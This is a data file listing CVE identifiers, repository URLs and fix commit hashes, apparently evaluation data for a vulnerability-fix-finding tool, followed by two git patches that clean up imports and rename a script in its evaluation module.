-CVE-2018-16406;https://github.com/mayan-edms/mayan-edms;None:None;False;48dfc06e49c7f773749e063f8cc69c95509d1c32; -CVE-2020-26275;https://github.com/jupyter-server/jupyter_server;None:None;False;85e4abccf6ea9321d29153f73b0bd72ccb3a6bca; -CVE-2016-7401;https://github.com/django/django;None:None;False;6118ab7d0676f0d622278e5be215f14fb5410b6; -CVE-2015-1832;https://github.com/apache/derby;None:None;False;0a1be27fce4f2be06daeed20f2cb8dd8f1932ae9,7643f9651406e12c9563a92b3dd258505e6c7144,a72ebf9def427bd0e3838eb0e3fa9c3266e88297; -CVE-2017-12616;https://github.com/apache/tomcat;None:None;False;07dc0ea2745f0afab6415f22b16a29f1c6de5727; -CVE-2019-1003017;https://github.com/jenkinsci/job-import-plugin;None:None;False;8f826a684ba0969697d2a92a6f448aef8f03b66c; -CVE-2020-27783;https://github.com/lxml/lxml;None:None;False;89e7aad6e7ff9ecd88678ff25f885988b184b26,a105ab8dc262ec6735977c25c13f0bdfcdec72a; -APACHE-COMMONS-001;https://github.com/apache/commons-compress;None:None;False;a080293da69f3fe3d11d5214432e1469ee195870,e9f2dadb916063c1e97ab2bbf41bee059e277c19; -SCRAPY-676;https://github.com/scrapy/scrapy;None:None;False;43217fd698135b4795d191f8a935f3ba0b869c54,554102fd70b14ee83109003cf77ab3a4f91f4f58,c2a424daaeca851c9d4a6b930eabf2a0422fdfe3; -CVE-2019-1003010;https://github.com/jenkinsci/git-plugin;None:None;False;f9152d943936b1c6b493dfe750d27f0caa7c0767; -CVE-2017-4992;https://github.com/cloudfoundry/uaa;None:None;False;1c9c6dd88266cfa7d333e5d8be1031fa31c5c93; -CVE-2018-17420;https://github.com/94fzb/zrlog;None:None;False;157b8fbbb64eb22ddb52e7c5754e88180b7c3d4f; -CVE-2014-9527;https://github.com/apache/poi;None:None;False;39dbbe9c413f9d04d6b51a20e93f2a2ff270f314; -CVE-2019-1003005;https://github.com/jenkinsci/script-security-plugin;None:None;False;35119273101af26792457ec177f34f6f4fa49d99; -CVE-2019-1003092;https://github.com/jenkinsci/nomad-plugin;None:None;False;3331d24896b815c375e528207c5572e18631c49d; -CVE-2017-18361;https://github.com/Pylons/colander;None:None;False;d4f4f77a2cfa518426178bd69d2b29dee57f770d,1a17b237fed2fdd3ac0e04ec8bfb4b206c7fe046; -CVE-2014-2058;https://github.com/jenkinsci/jenkins.git;None:None;False;b6b2a367a7976be80a799c6a49fa6c58d778b50e; -CVE-2019-16555;https://github.com/jenkinsci/build-failure-analyzer-plugin;None:None;False;f316c885552ac75289cbb11b2af5757f18784bcb; -CVE-2016-10516;https://github.com/pallets/werkzeug;None:None;False;1034edc7f901dd645ec6e462754111b39002bd65; -CVE-2018-8718;https://github.com/jenkinsci/mailer-plugin;None:None;False;98e79cf904769907f83894e29f50ed6b3e7eb135; -CVE-2019-11340;https://github.com/matrix-org/sydent;None:None;False;4e1cfff53429c49c87d5c457a18ed435520044fc; -CVE-2019-1003008;https://github.com/jenkinsci/warnings-ng-plugin;None:None;False;c3ca6a0b66b3e2958257c13c0c8e1833431fe73d; -CVE-2018-1002200;https://github.com/codehaus-plexus/plexus-archiver;None:None;False;58bc24e465c0842981692adbf6d75680298989de; -CVE-2019-1003039;https://github.com/jenkinsci/appdynamics-plugin;None:None;False;c5efd9d97babf05db31bfdbefc49c3c49b3c781f; -CVE-2020-13944;https://github.com/apache/airflow;None:None;False;5c2bb7b0b0e717b11f093910b443243330ad93ca; -CVE-2020-15251;https://github.com/MirahezeBots/sopel-channelmgnt;None:None;False;fd5da591fed6395702cfc9b74bc95c4dd6997e78,221ddd4852f0acbb9c98824332f7a499d2a3a362,4b7dff2bcf68bb614f9449f6d151f06af5aa1d76,6554cc81101d6892f7dc70012b784ddc7491bb8e; -CVE-2019-2435;https://github.com/mysql/mysql-connector-python;None:None;False;069bc6737dd13b7f3a41d7fc23b789b659d8e20; -CVE-2012-2378;https://github.com/apache/cxf;None:None;False;9bb4612d3352ef3e3292fdce25e3c70b43d63c6f; -CVE-2018-1000863;https://github.com/jenkinsci/jenkins;None:None;False;4ed66e5838476e575a83c3cd13fffb37eefa2f48; -CVE-2020-2191;https://github.com/jenkinsci/swarm-plugin;None:None;False;4d18f98b00e4c84b152d52346fb9ef1a227b1cf7; -SONARQUBE-001;https://github.com/SonarSource/sonarqube;None:None;False;08438a2c47112f2fce1e512f6c843c908abed4c7; -CVE-2018-16167;https://github.com/JPCERTCC/LogonTracer;None:None;False;2bb79861dbaf7e8a9646fcd70359523fdb464d9c; -CVE-2019-10904;https://github.com/roundup-tracker/roundup;None:None;False;a2edc3cba0b5d34005114f6da0251bd9ac2837df; -CVE-2017-8032;https://github.com/cloudfoundry/uaa;None:None;False;4e4d653edb6b8f68e12b7c415e07e068b1574b8; -CVE-2019-1003084;https://github.com/jenkinsci/zephyr-enterprise-test-management-plugin;None:None;False;a2a698660c12d78e06f78c813c3ff10b4c30db16; -CVE-2016-6812;https://github.com/apache/cxf;None:None;False;45b1b5b94aaebca6900cfff6c62a5d038e9ad28b,a23c615b68830edb56855f8edb015fae32616516; -CVE-2016-9014;https://github.com/django/django;None:None;False;45acd6d836895a4c36575f48b3fb36a3dae98d1; -CVE-2018-20244;https://github.com/apache/airflow;None:None;False;27a4a888e946728d9bb33b78ec604e08d4a93f89; -CVE-2019-11938;https://github.com/facebook/fbthrift;None:None;False;08c2d412adb214c40bb03be7587057b25d053030,71c97ffdcb61cccf1f8267774e873e21ebd3ebd3; -CVE-2015-2944;https://github.com/apache/sling-old-svn-mirror;None:None;False;db1ccbd029e9620c12534deb6d0314738f323c66,d2ba859e23e219446cdaba4a908c730e28c44959,add3a9a751f65308d7b1cf18c4d56b9e5dde5e4c; -CVE-2020-9402;https://github.com/django/django;None:None;False;26a5cf834526e291db00385dd33d319b8271fc4,fe886a3b58a93cfbe8864b485f93cb6d426cd1f,02d97f3c9a88adc890047996e5606180bd1c616; -CVE-2020-15142;https://github.com/triaxtec/openapi-python-client;None:None;False;f7a56aae32cba823a77a84a1f10400799b19c19a; -CVE-2018-1000067;https://github.com/jenkinsci/jenkins;None:None;False;2d16b459205730d85e51499c2457109b234ca9d9; -CVE-2017-4995-JK;https://github.com/FasterXML/jackson-databind;None:None;False;6ce32ffd18facac6abdbbf559c817b47fcb622c; -CVE-2020-26259;https://github.com/x-stream/xstream;None:None;False;0bcbf50126a62dfcd65f93a0da0c6d1ae92aa738; -CVE-2019-1003035;https://github.com/jenkinsci/azure-vm-agents-plugin;None:None;False;91bfc7d95ae1349ce2a8b6b7e73155848fdc1d82; -CVE-2019-14235;https://github.com/django/django;None:None;False;cf694e6852b0da7799f8b53f1fb2f7d20cf1753; -CVE-2020-24583;https://github.com/django/django;None:None;False;934430d22aa5d90c2ba33495ff69a6a1d997d58,08892bffd275c79ee1f8f67639eb170aaaf1181,375657a71c889c588f723469bd868bd1d40c369; -CVE-2018-1062;https://gerrit.ovirt.org/ovirt-engine.git;None:None;False;820888c4e8dfbe79dc55e1ba8e72edb0ebd8890; -CVE-2019-12387;https://github.com/twisted/twisted;None:None;False;6c61fc4503ae39ab8ecee52d10f10ee2c371d7e2; -CVE-2020-9487;https://github.com/apache/nifi;None:None;False;01e42dfb3291c3a3549023edadafd2d8023f3042; -CVE-2019-9735;https://github.com/openstack/neutron;None:None;False;558a977902c9e83aabaefe67333aee544aa8658; -DJANGO-REST-002;https://github.com/encode/django-rest-framework;None:None;False;4bb9a3c48427867ef1e46f7dee945a4c25a4f9b8; -CVE-2020-26882;https://github.com/playframework/playframework;None:None;False;585590673fa55f0d8218b18a00be7ca9370538d,c8bff5635254ffa1a37db640effc5ef55002d2e,d9370f49735c7d04e67879cbdd29f74c9a2c442; -CVE-2019-10332;https://github.com/jenkinsci/electricflow-plugin;None:None;False;0a934493290773a953fa7b29c19b555971b1144b; -CVE-2011-2730;https://github.com/spring-projects/spring-framework.git;None:None;False;9772eb8410e37cd0bdec0d1b133218446c778beb; -REQUESTS-5099;https://github.com/psf/requests;None:None;False;d88240ba449f1c92006102adc475543d5e649ffa; -CVE-2018-11786;https://github.com/apache/karaf;None:None;False;24fb477ea886e8f294dedbad98d2a2c4cb2a44f9; -CVE-2016-2513;https://github.com/django/django;None:None;False;af7d09b0c5c6ab68e629fd9baf736f9dd203b18; -CVE-2019-7548;https://github.com/sqlalchemy/sqlalchemy;None:None;False;30307c4616ad67c01ddae2e1e8e34fabf6028414; -CVE-2018-11764;https://github.com/apache/hadoop;None:None;False;493924def8f184e74d57153afc9c22b0eeb95e9c; -CVE-2019-10361;https://github.com/jenkinsci/m2release-plugin;None:None;False;a2e7f2bb82640a9d3641265a19c86ba141a7e79c; -CVE-2020-15252;https://github.com/xwiki/xwiki-platform;None:None;False;1bf4eadddf3ca35ba536f7add139d5027e1d427,766e5e8480fc893ced8fc8f34e81f97d4a69449; -CVE-2018-9856;https://github.com/Kotti/Kotti;None:None;False;00b56681fa9fb8587869a5e00dcd56503081d3b9; -CVE-2017-0906;https://github.com/recurly/recurly-client-python;None:None;False;049c74699ce93cf126feff06d632ea63fba36742; -CVE-2017-12615;https://github.com/apache/tomcat;None:None;False;e862b0c259b4c867553df29cef1af9e904af83b0,07dc0ea2745f0afab6415f22b16a29f1c6de5727; -CVE-2019-16556;https://github.com/jenkinsci/rundeck-plugin;None:None;False;157f8fc845c05f7ad6417875b1fa15bb0e47543b; -CVE-2016-8739;https://github.com/apache/cxf;None:None;False;8e4970d931ae72f92c54d170a844b37137b8fda6; -CVE-2014-2059;https://github.com/jenkinsci/jenkins.git;None:None;False;ad38d8480f20ce3cbf8fec3e2003bc83efda4f7d; -NEO-PYTHON-001;https://github.com/CityOfZion/neo-python;None:None;False;8e9c488bc0506f13424dc4208b64f250dff2818d; -CVE-2015-0899;https://github.com/kawasima/struts1-forever;None:None;False;212bb0f7c57617b7b9c44cb1e056bd1e597c8e16; -CVE-2019-1003015;https://github.com/jenkinsci/job-import-plugin;None:None;False;1d81e59330d371d15d3672dabc17d35dcd9fb824; -AMQ-5751;https://github.com/apache/activemq;None:None;False;886e2d4d97555e2f10276616389a5d1f915bad18; -CVE-2020-15120;https://github.com/spiral-project/ihatemoney;None:None;False;7fd18288888b7cc913382da2f3d1020815d74cdf,8d77cf5d5646e1d2d8ded13f0660638f57e98471; -CVE-2020-12668;https://github.com/HubSpot/jinjava;None:None;False;1b9aaa4b420c58b4a301cf4b7d26207f1c8d1165,5dfa5b87318744a4d020b66d5f7747acc36b213b; -CVE-2018-1000104;https://github.com/jenkinsci/coverity-plugin;None:None;False;34b7c2b07014b8e1e708361170146600db172491; -CVE-2019-5918;https://github.com/nablarch/nablarch-core-dataformat;None:None;False;3afbc9735a310c14a00841e58210bd3c15de4e88; -CVE-2019-10334;https://github.com/jenkinsci/electricflow-plugin;None:None;False;d0b807d5e2de07a90d902401bae033c2907b850a; -CVE-2016-5394;https://github.com/apache/sling;None:None;False;7d2365a248943071a44d8495655186e4f14ea294; -CVE-2019-19687;https://github.com/openstack/keystone;None:None;False;17c337dbdbfb9d548ad531c2ad0483c9bce5b98f; -CVE-2017-7234;https://github.com/django/django;None:None;False;001ff508081a893d0cf81df1214dbd234606c36; -CVE-2018-16859;https://github.com/ansible/ansible;None:None;False;8c1f701e6e9df29fe991f98265e2dd76acca4b8c; -CVE-2017-15720;https://github.com/apache/airflow;None:None;False;daa281c0364609d6812921123cf47e4118b40484; -CVE-2020-15163;https://github.com/theupdateframework/tuf;None:None;False;3d342e648fbacdf43a13d7ba8886aaaf07334af7; -CVE-2019-1003009;https://github.com/jenkinsci/active-directory-plugin;None:None;False;520faf5bb1078d75e5fed10b7bf5ac6241fe2fc4; -CVE-2019-18835;https://github.com/matrix-org/synapse;None:None;False;172f264ed38e8bef857552f93114b4ee113a880b; -CVE-2018-1999036;https://github.com/jenkinsci/ssh-agent-plugin;None:None;False;3a8abe1889d25f9a73cdba202cf27212b273de4d; -CVE-2015-5159;https://github.com/latchset/kdcproxy;None:None;False;f274aa6787cb8b3ec1cc12c440a56665b7231882; -AMQP-590;https://github.com/spring-projects/spring-amqp;None:None;False;462dcb6f1f93d54923daffb9729c1c8519576c08; -CVE-2019-1003026;https://github.com/jenkinsci/mattermost-plugin;None:None;False;51ebae2c57977193b45cd60fc70595a0e6df4cb2; -CVE-2019-10460;https://github.com/jenkinsci/bitbucket-oauth-plugin;None:None;False;f55d222db910220ca8cd8631fb746c98b9e12870; -CVE-2020-17518;https://github.com/apache/flink;None:None;False;a5264a6f41524afe8ceadf1d8ddc8c80f323ebc4; -CVE-2020-26250;https://github.com/jupyterhub/oauthenticator;None:None;False;a4aac191c16cf6281f3d346615aefa75702b02d7; -CVE-2018-1999045;https://github.com/jenkinsci/jenkins;None:None;False;ef9583a24abc4de157e1570cb32d7a273d327f36; -ANSIBLE-RUNNER-237;https://github.com/ansible/ansible-runner;None:None;False;4af02527634046b80245face235d3d6e2f0e9f3a; -CVE-2019-16558;https://github.com/jenkinsci/inflectra-spira-integration-plugin;None:None;False;418c8e8f36d847837d00eaab59c9c04d92d41548; -JENKINS-ACUNETIX-980;https://github.com/jenkinsci/acunetix-plugin;None:None;False;b702b1906d3ae8a06ef6b394efe0d85d805fa738; -CVE-2018-1999042;https://github.com/jenkinsci/jenkins;None:None;False;727d58f690abf64f543407e1de3545eca76ad30e; -CVE-2019-10476;https://github.com/jenkinsci/zulip-plugin;None:None;False;2a9dd6c41c2d913b0414d015b3118e3ddb60bd90; -CVE-2020-36242;https://github.com/pyca/cryptography;None:None;False;06cbf77371881e80ea4b5e349136dcc53749fc0c; -LXML-461;https://github.com/lxml/lxml;None:None;False;89e7aad6e7ff9ecd88678ff25f885988b184b26e; -CVE-2020-12691;https://github.com/openstack/keystone;None:None;False;d009384c9b683008d572f9996e1fe4e5e5d82096; -CVE-2019-12417;https://github.com/apache/airflow;None:None;False;caf1f264b845153b9a61b00b1a57acb7c320e743; -CVE-2013-6372;https://github.com/jenkinsci/subversion-plugin.git;None:None;False;7d4562d6f7e40de04bbe29577b51c79f07d05ba6; -CVE-2009-0039;https://github.com/apache/geronimo;None:None;False;aa0c2c26dde8930cad924796af7c17a13d236b16,f8a612df7b06729bfd6c826e1a110d4bb40dc1f5,67dda0760bb0925ead201ddd5d809ff53686d63f; -CVE-2020-26234;https://github.com/opencast/opencast;None:None;False;4225bf90af74557deaf8fb6b80b0705c9621acfc; -CVE-2017-11427;https://github.com/onelogin/python-saml;None:None;False;fad881b4432febea69d70691dfed51c93f0de10f; -CVE-2017-1000481;https://github.com/plone/Products.CMFPlone;None:None;False;236b62b756ff46a92783b3897e717dfb15eb07d8; -CVE-2019-10358;https://github.com/jenkinsci/maven-plugin;None:None;False;23e3fe5c43705883e4fb9d3ba052dfb1af3f2464; -CVE-2020-6174;https://github.com/theupdateframework/tuf;None:None;False;a0397c7c820ec1c30ebc793cc9469b61c8d3f50e; -CVE-2020-15225;https://github.com/carltongibson/django-filter;None:None;False;82c9a420d2ab9addcb20d6702e74afa5c04cd91f; -CVE-2019-1003003;https://github.com/jenkinsci/jenkins;None:None;False;07c09bebb8396a48063c1da4fc4b628acddd72a8; -CVE-2020-26137;https://github.com/urllib3/urllib3;None:None;False;1dd69c5c5982fae7c87a620d487c2ebf7a6b436b; -CVE-2020-14365;https://github.com/ansible/ansible;None:None;False;1d043e082b3b1f3ad35c803137f5d3bcbae92275; -CVE-2011-2765;https://github.com/irmen/Pyro3;None:None;False;554e095a62c4412c91f981e72fd34a936ac2bf1e; -CVE-2018-1000110;https://github.com/jenkinsci/git-plugin;None:None;False;a3d3a7eb7f75bfe97a0291e3b6d074aafafa86c9; -CVE-2018-6188;https://github.com/django/django;None:None;False;af33fb250e9847f1ca8c0ba0d72671d76659704f; -CVE-2019-10307;https://github.com/jenkinsci/analysis-core-plugin;None:None;False;3d7a0c7907d831c58541508b893dcea2039809c5; -CVE-2019-10416;https://github.com/jenkinsci/violation-comments-to-gitlab-plugin;None:None;False;76ee602dc5297064cdce798dcabaa1560a5adfc6,e8237a803012bae7773d8bd10fe02e21892be3fe; -CVE-2018-6356;https://github.com/jenkinsci/jenkins;None:None;False;9de62915807deab61d6e780eed660428f9889b51,eb03a42078f29dbed3742b8740c95e02890e4545; -CVE-2015-0886;https://github.com/djmdjm/jBCrypt;None:None;False;0c28b698e79b132391be8333107040d774c79995; -CVE-2019-6446;https://github.com/numpy/numpy;None:None;False;a2bd3a7eabfe053d6d16a2130fdcad9e5211f6b,8cea82a54a36b2232b484c7a50a32cefcb85e6b; -CVE-2020-28052;https://github.com/bcgit/bc-java;None:None;False;97578f9b7ed277e6ecb58834e85e3d18385a4219; -HDFS-10276;https://github.com/apache/hadoop;None:None;False;5ea6fd85c7aff6df28b87789f607bb57ee92063; -CVE-2020-10289;https://github.com/ros/actionlib;None:None;False;b003365642227049abd01281c296977d8749f85f; -CVE-2012-6119;https://github.com/candlepin/candlepin.git;None:None;False;f4d93230e58b969c506b4c9778e04482a059b08c; -CVE-2018-8036;https://github.com/apache/pdfbox;None:None;False;038c09b5f361e083a00ce076c95521b73202fcb4; -CVE-2017-1000487;https://github.com/codehaus-plexus/plexus-utils;None:None;False;b38a1b3a4352303e4312b2bb601a0d7ec6e28f41; -CVE-2018-1000109;https://github.com/jenkinsci/google-play-android-publisher-plugin;None:None;False;f81b058289caf3332ae40d599a36a3665b1fa13c; -CVE-2007-5712;https://github.com/django/django;None:None;False;412ed22502e11c50dbfee854627594f0e7e2c23; -CVE-2018-1000866;https://github.com/jenkinsci/groovy-sandbox;None:None;False;0cd7ec12b7c56cfa3167d99c5f43147ce05449d3; -CVE-2021-21607;https://github.com/jenkinsci/jenkins;None:None;False;a890d68699ad6ca0c8fbc297a1d4b7ebf23f384b; -CVE-2016-9910;https://github.com/html5lib/html5lib-python;None:None;False;9b8d8eb5afbc066b7fac9390f5ec75e5e8a7cab7; -CVE-2017-14696;https://github.com/saltstack/salt;None:None;False;5f8b5e1a0f23fe0f2be5b3c3e04199b57a53db5b; -CVE-2020-24715;https://github.com/scalyr/scalyr-agent-2;None:None;False;56d26e09733acc047e88d873e1fd8478dd10961c; -CVE-2015-7940;http://git.bouncycastle.org/repositories/bc-java;None:None;False;5cb2f0578e6ec8f0d67e59d05d8c4704d8e05f83,e25e94a046a6934819133886439984e2fecb2b04; -CVE-2020-26939;https://github.com/bcgit/bc-java;None:None;False;930f8b274c4f1f3a46e68b5441f1e7fadb57e8c1; -CVE-2018-1000808;https://github.com/pyca/pyopenssl;None:None;False;e73818600065821d588af475b024f4eb518c3509; -CVE-2018-16166;https://github.com/JPCERTCC/LogonTracer;None:None;False;2bb79861dbaf7e8a9646fcd70359523fdb464d9c; -SPR-7779;https://github.com/spring-projects/spring-framework;None:None;False;f4a2282d9d9f6e58029022c58311a1db07f7defc; -CVE-2014-0050;https://github.com/apache/commons-fileupload;None:None;False;c61ff05b3241cb14d989b67209e57aa71540417a; -APACHE-SLING-5946;https://github.com/apache/sling-org-apache-sling-xss;None:None;False;bf2fb9bfb7aad00ece84456b3bd0a015d61788b9; -CVE-2019-17134;https://github.com/openstack/octavia;None:None;False;b0c2cd7b4c835c391cfedf12cf9f9ff8a0aabd17; -CVE-2019-1003047;https://github.com/jenkinsci/fortify-on-demand-uploader-plugin;None:None;False;e555f8d62ef793ce221f471d7172cad847fb9252; -CVE-2021-21330;https://github.com/aio-libs/aiohttp;None:None;False;2545222a3853e31ace15d87ae0e2effb7da0c96b; -CVE-2017-1000393;https://github.com/jenkinsci/jenkins;None:None;False;d7ea3f40efedd50541a57b943d5f7bbed046d091; -PYCRYPTODOME-90;https://github.com/Legrandin/pycryptodome;None:None;False;99c27a3b9e8a884bbde0e88c63234b669d4398d8; -CVE-2019-7313;https://github.com/buildbot/buildbot;None:None;False;f0ccd5fd572ea8223b48bd57d8c2548b2f7d3ecf; -HADOOP-13105;https://github.com/apache/hadoop;None:None;False;5e6ee5aafb9b9f200d906444e4731cfc60ac6eb; -CVE-2020-11010;https://github.com/tortoise/tortoise-orm;None:None;False;75e41ca12b2a991c4508e765828d5e7b1c37cba,91c364053e0ddf77edc5442914c6f049512678b; -CVE-2019-0228;https://github.com/apache/pdfbox;None:None;False;072d68ec99a71bf271ec0f879e5cd71511e89093; -CVE-2019-10342;https://github.com/jenkinsci/docker-plugin;None:None;False;6ad27199f6fad230be72fd45da78ddac85c075db; -CVE-2019-10856;https://github.com/jupyter/notebook;None:None;False;979e0bd15e794ceb00cc63737fcd5fd9addc4a99; -CVE-2020-13955;https://github.com/apache/calcite;None:None;False;43eeafcbac29d02c72bd520c003cdfc571de2d15; -S2-043;https://github.com/apache/struts;None:None;False;ba0563183b128dcef88b469f46e528a12e0179e7; -CVE-2019-10255;https://github.com/jupyter/notebook;None:None;False;08c4c898182edbe97aadef1815cce50448f975cb,70fe9f0ddb3023162ece21fbb77d5564306b913b; -CVE-2019-10311;https://github.com/jenkinsci/ansible-tower-plugin;None:None;False;b63a047281c2389217c9404f2f4bd4c9e66364fe; -CVE-2019-1003029;https://github.com/jenkinsci/script-security-plugin;None:None;False;f2649a7c0757aad0f6b4642c7ef0dd44c8fea434; -CVE-2019-10415;https://github.com/jenkinsci/violation-comments-to-gitlab-plugin;None:None;False;76ee602dc5297064cdce798dcabaa1560a5adfc6,e8237a803012bae7773d8bd10fe02e21892be3fe; -CVE-2015-1326;https://github.com/martinpitt/python-dbusmock;None:None;False;4e7d0df909338eb3c44b083722c7bf8b76bdf940; -CVE-2019-12308;https://github.com/django/django;None:None;False;09186a13d975de6d049f8b3e05484f66b01ece6; -CVE-2019-1003013;https://github.com/jenkinsci/blueocean-plugin;None:None;False;62775e78532b756826bb237775b64a5052624b57; -CVE-2012-6153;https://github.com/apache/httpcomponents-client;None:None;False;6e14fc146a66e0f3eb362f45f95d1a58ee18886a; -CVE-2020-10108;https://github.com/twisted/twisted;None:None;False;4a7d22e490bb8ff836892cc99a1f54b85ccb0281; -CVE-2019-10430;https://github.com/jenkinsci/neuvector-vulnerability-scanner-plugin;None:None;False;65b7ae14a21dd566a671631694121cee458ce3cf; -CVE-2018-1000149;https://github.com/jenkinsci/ansible-plugin;None:None;False;06d30e5b626a978e258a7f4ab473cd7f53a7cba7; -CVE-2020-9486;https://github.com/apache/nifi;None:None;False;148537d64a017b73160b0d49943183c18f883ab0; -CVE-2014-2061;https://github.com/jenkinsci/jenkins.git;None:None;False;bf539198564a1108b7b71a973bf7de963a6213ef; -CVE-2014-2066;https://github.com/jenkinsci/jenkins.git;None:None;False;8ac74c350779921598f9d5edfed39dd35de8842a; -CVE-2016-2512;https://github.com/django/django;None:None;False;382ab137312961ad62feb8109d70a5a581fe835; -PYRO4-001;https://github.com/irmen/Pyro4;None:None;False;a9544e05ff175201187ff1530364dd4d77ee0d3d; -CVE-2020-1747;https://github.com/yaml/pyyaml;None:None;False;5080ba513377b6355a0502104846ee804656f1e0; -CVE-2017-12852;https://github.com/numpy/numpy;None:None;False;01718a9feb7f949b091e4f95320c1a60116e77a5,11593aa176d491beb0cc5ffcc393956a5435a2bf; -QUARKUS-10050;https://github.com/quarkusio/quarkus;None:None;False;8141f98b4d690afb7ff6cf5dc3bf980fdb3d9e34; -CVE-2020-11974;https://github.com/apache/incubator-dolphinscheduler;None:None;False;86f4276f0fd8d3d42ce9bcc13463eb015232b56f; -CVE-2017-8342;https://github.com/Kozea/Radicale;None:None;False;059ba8dec1f22ccbeab837e288b3833a099cee2; -CVE-2019-11324;https://github.com/urllib3/urllib3;None:None;False;1efadf43dc63317cd9eaa3e0fdb9e05ab07254b1; -CVE-2011-1498;https://github.com/apache/httpcomponents-client;None:None;False;a572756592c969affd0ce87885724e74839176fb; -CVE-2020-13757;https://github.com/sybrenstuvel/python-rsa;None:None;False;93af6f2f89a9bf28361e67716c4240e691520f30; -CVE-2020-13254;https://github.com/django/django;None:None;False;07e59caa02831c4569bbebb9eb773bdd9cb4b20,84b2da5552e100ae3294f564f6c862fef8d0e69; -CVE-2019-1003006;https://github.com/jenkinsci/groovy-plugin;None:None;False;212e048a319ae32dad4cfec5e73a885a9f4781f0; -CVE-2018-17175;https://github.com/marshmallow-code/marshmallow;None:None;False;d5d9cb22dda6f39117f6f9497a6a66813cb8c64f; -CVE-2019-1003046;https://github.com/jenkinsci/fortify-on-demand-uploader-plugin;None:None;False;e555f8d62ef793ce221f471d7172cad847fb9252; -CVE-2021-25646;https://github.com/apache/druid;None:None;False;ae4b1920c53d34008ab55cfa2e368a8affad77a,3f8f00a231c4b47981e0e2e48f18f1221249e6f; -CVE-2019-16553;https://github.com/jenkinsci/build-failure-analyzer-plugin;None:None;False;f316c885552ac75289cbb11b2af5757f18784bcb; -CVE-2016-6798;https://github.com/apache/sling;None:None;False;fb2719e8299fadddae62245482de112052a0e08c; -CVE-2017-1000388;https://github.com/jenkinsci/depgraph-view-plugin;None:None;False;d442ff671965c279770b28e37dc63a6ab73c0f0e; -CVE-2021-21479;https://github.com/SAP/scimono;None:None;False;413b5d75fa94e77876af0e47be76475a23745b80; -CVE-2020-14366;https://github.com/keycloak/keycloak;None:None;False;1281f28bb8d9968cce443324b81319fa25d70d65; -IMAGEIO-483;https://github.com/imageio/imageio;None:None;False;5b398716d518cd14e8b978ea3cd8ec6c0236c1d8; -CVE-2019-10436;https://github.com/jenkinsci/google-oauth-plugin;None:None;False;aef26a8425e515a9986412000d6191db95fa9e56; -HADOOP-15212;https://github.com/apache/hadoop;None:None;False;2dd960de983a30bf0d9ee957bdb09f825f9d40a; -CVE-2019-10326;https://github.com/jenkinsci/warnings-ng-plugin;None:None;False;38e5354161733ef9e458b44ad08676d79640fa36; -CVE-2018-12585;https://github.com/OPCFoundation/UA-Java;None:None;False;83fe7a9f9a510f35e3903bef907d22889f99b08b; -CVE-2021-21241;https://github.com/Flask-Middleware/flask-security;None:None;False;61d313150b5f620d0b800896c4f2199005e84b1f; -INDICO-2019-10-2;https://github.com/indico/indico;None:None;False;0796f373b68bc2722048caed7f3a892d8e1851e,556343cfe735ec2cfa2085d789d548656c496bb; -CVE-2019-14856;https://github.com/ansible/ansible;None:None;False;7f4befdea77045fa83b5f2b304bd5e16b219f74c; -CVE-2016-1000001;https://github.com/puiterwijk/flask-oidc;None:None;False;f2ef8b4ffa445be00f6602e446e60916f4ee4d30; -CVE-2020-15141;https://github.com/triaxtec/openapi-python-client;None:None;False;3e7dfae5d0b3685abf1ede1bc6c086a116ac4746; -CVE-2019-10906;https://github.com/pallets/jinja;None:None;False;a2a6c930bcca591a25d2b316fcfd2d6793897b26; -CVE-2013-4378;https://github.com/javamelody/javamelody;None:None;False;aacbc46151ff4ac1ca34ce0899c2a6113071c66e; -CVE-2020-27217;https://github.com/eclipse/hono;None:None;False;af439d58fa12ebf95cfbdd26b4505b57d7debf11; -CVE-2020-12676;https://github.com/FusionAuth/fusionauth-samlv2;None:None;False;886dbb55613e5c2b99a8b83232f846ba7e5cd5ea; -CVE-2013-1445;https://github.com/dlitz/pycrypto;None:None;False;19dcf7b15d61b7dc1a125a367151de40df6ef175; -CVE-2015-8557;https://github.com/sol/pygments;None:None;False;74e7ad477f7ff7a70b987fcfc5c558ec14264c13; -CVE-2017-1000433;https://github.com/rohe/pysaml2;None:None;False;6312a41e037954850867f29d329e5007df1424a5; -2012-05-05;https://github.com/google/gson;None:None;False;1103bda23acb1719364e834a4545739ec2f76cd0; -CVE-2012-2417;https://github.com/Legrandin/pycrypto;None:None;False;9f912f13df99ad3421eff360d6a62d7dbec755c2; -CVE-2018-8042;https://github.com/apache/ambari;None:None;False;5d1fa9d11f856a7460734244c22900dcbf314db; -CVE-2020-12889;https://github.com/MISP/MISP-maltego;None:None;False;3ccde66dab4096ab5663e69f352992cc73e1160b; -CVE-2015-0260;https://github.com/msabramo/kallithea;None:None;False;7ae870ffbceb932cb5fff1a7f48e88f4996db7c8; -CVE-2021-21290;https://github.com/netty/netty;None:None;False;c735357bf29d07856ad171c6611a2e1a0e0000ec; -FLASK-ADMIN-001;https://github.com/flask-admin/flask-admin;None:None;False;0dc5a48fd0a4fdd28172e0bc508373ddb58fc50b; -CVE-2017-1000502;https://github.com/jenkinsci/ec2-plugin;None:None;False;180f7d0eae6031d67259a5d86d9d7d382f9eb05b; From 312ee0c76601f2dc1b34622acaf3d95cc664e7b5 Mon Sep 17 00:00:00 2001 From: I748376 Date: Fri, 2 Aug 2024 13:54:51 +0000 Subject: [PATCH 074/130] removes unnecessary import --- prospector/evaluation/__init__.py | 1 - 1 file changed, 1 deletion(-) diff --git a/prospector/evaluation/__init__.py b/prospector/evaluation/__init__.py index 06ee5294c..e69de29bb 100644 --- a/prospector/evaluation/__init__.py +++ b/prospector/evaluation/__init__.py @@ -1 +0,0 @@ -from .dispatch_jobs import run_prospector_and_generate_report From 2a693487f11cf501e7233bd2514cb2f915d5e14e Mon Sep 17 00:00:00 2001 From: I748376 Date: Fri, 2 Aug 2024 13:56:03 +0000 Subject: [PATCH 075/130] renames run_multiple to main and removes unused code from it --- .../evaluation/{run_multiple.py => main.py} | 16 +++------------- 1 file changed, 3 insertions(+), 13 deletions(-) rename prospector/evaluation/{run_multiple.py => main.py} (89%) diff --git a/prospector/evaluation/run_multiple.py b/prospector/evaluation/main.py similarity index 89% rename from prospector/evaluation/run_multiple.py rename to prospector/evaluation/main.py index 51905732c..57e8d758c 100644 --- a/prospector/evaluation/run_multiple.py +++ b/prospector/evaluation/main.py @@ -7,8 +7,6 @@ from evaluation.analyse import ( analyse_prospector_reports, analyse_statistics, - analyze_prospector, - analyze_results_rules, count_existing_reports, ) from evaluation.dispatch_jobs import ( @@ -17,10 +15,6 @@ ) -def is_missing(path: str): - return not os.path.exists(path) - - def parse_cli_args(args): parser = 